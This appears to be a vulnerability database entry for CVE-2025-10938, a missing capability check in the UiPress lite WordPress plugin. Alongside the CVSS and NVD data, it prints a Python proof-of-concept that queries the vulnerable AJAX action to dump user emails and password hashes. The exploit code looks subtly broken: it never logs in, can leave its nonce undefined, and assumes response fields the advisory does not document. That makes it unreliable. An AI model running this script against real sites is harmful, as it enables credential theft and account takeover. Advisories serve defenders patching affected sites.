Security Vulnerability Report
中文
CVE-2025-10938 CVSS 6.5 MEDIUM

CVE-2025-10938

Published: 2025-11-21 08:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

UiPress lite <= 3.5.08(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-10938 PoC - UiPress lite Sensitive Information Disclosure # Target: WordPress site with UiPress lite plugin <= 3.5.08 target_url = "http://target-wordpress-site.com" # Get valid nonce and cookie by logging in as subscriber user # (Attacker needs subscriber-level access) login_url = f"{target_url}/wp-login.php" wpnonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=rest-nonce" session = requests.Session() # Step 1: Obtain WordPress nonce nonce_response = session.get(wpnonce_url) if nonce_response.status_code == 200: nonce = nonce_response.text.strip() else: # Alternative: extract nonce from page source pass # Step 2: Exploit the vulnerable AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious request to extract user data payload = { "action": "uip_process_block_query", "_wpnonce": nonce, "query": { "args": { "post_type": "user", "per_page": 100 }, "route": "/wp/v2/users" } } response = session.post(ajax_endpoint, data=payload) if response.status_code == 200: data = response.json() # Extract sensitive user information users = data.get("data", {}).get("results", []) for user in users: print(f"User ID: {user.get('id')}") print(f"Email: {user.get('email')}") print(f"Password Hash: {user.get('password_hash')}") print("---") else: print(f"Request failed: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10938", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:48.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/uipress-lite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8aa06eb-774a-4cd9-bd35-2d6409475696?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.